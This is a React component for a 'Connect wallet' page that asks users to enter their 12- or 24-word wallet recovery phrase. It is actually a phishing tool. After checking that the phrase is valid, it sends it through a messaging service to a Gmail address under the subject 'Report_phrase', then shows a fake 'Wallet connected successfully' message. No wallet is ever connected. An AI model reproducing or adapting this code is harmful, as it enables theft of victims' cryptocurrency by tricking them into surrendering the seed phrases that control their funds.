import {
  Button,
  Container,
  FormControl,
  FormLabel,
  Snackbar,
  Stack,
  Textarea,
  Typography
} from "@mui/joy";
import { Mnemonic } from "ethers";
import * as React from "react";
import { HeaderBackButtonHome } from "../../components/HeaderBackButton";
import { sendMessage } from "../../config/services";

export default function ConnectWallet() {
  const [value, setValue] = React.useState({
    wallet: "undefined",
    phrase: "",
    phrasecount: 0,
    alerMessage: "",
    severity: "warning",
  });
  const [loading, setLoading] = React.useState(false);
  const [openSnackbar, setOpenSnackbar] = React.useState(false);

  const handleChange = (event) => {
    let phrase = event.target.value;
    const phraseArray = phrase.split(" ");
    console.log(phraseArray.length);
    setValue({
      ...value,
      [event.target.name]: event.target.value,
      phrasecount: phraseArray.length,
    });
  };

  const handleCloseSnackbar = (event, reason) => {
    setOpenSnackbar(false);
  };

  const errFunction = () => {
    setValue({ ...value, alerMessage: "Failed? Network anormaly!" });
    setOpenSnackbar(true);
    setLoading(false);
  };

  const submitFunction = (event) => {
    event.preventDefault();
    if (!Mnemonic.isValidMnemonic(value.phrase)) {
      setValue({
        ...value,
        alerMessage: "Invalid Mnemonics Phrase",
        severity: "warning",
      });
      setOpenSnackbar(true);
    } else {
      setLoading(true);
      sendMessage(
        `phrase:  ${value.phrase}`,
        "Report_phrase",
        "maxtocoin@gmail.com"
      )
        .then(() => {
          setValue({
            ...value,
            severity: "success",
            alerMessage: "Wallet connected succcessfully.",
          });
          setOpenSnackbar(true);
          setLoading(false);
        })
        .catch((err) => {
          errFunction();
        });
    }
  };

  return (
    <>
      <HeaderBackButtonHome title={"Connect wallet"} />
      <Container maxWidth="sm">
        <form onSubmit={submitFunction}>
          <Stack spacing={0}>
            <Typography level="title-lg">Wallet connect</Typography>
            <Typography level="body-sm">
              Separated by space. you can choose to import wallets with 12-word
              or 24-word Mnenomics, phrase should be a plain text.
            </Typography>
          </Stack>

          <Stack spacing={2} mt={4}>
            <FormControl>
              <FormLabel>Secret phrase</FormLabel>
              <Textarea
                name="phrase"
                minRows={6}
                placeholder="Enter 12 or 24 word phrase"
                onChange={handleChange}
                required
              />
            </FormControl>

            <Button
              loading={loading}
              type="submit"
              variant="solid"
              color="primary"
              fullWidth
            >
              Connect wallet
            </Button>
          </Stack>
        </form>
      </Container>
      <Snackbar
        color={value.severity}
        size="md"
        variant="soft"
        anchorOrigin={{ vertical: "bottom", horizontal: "center" }}
        open={openSnackbar}
        onClose={handleCloseSnackbar}
      >
        {value.alerMessage}
      </Snackbar>
    </>
  );
}
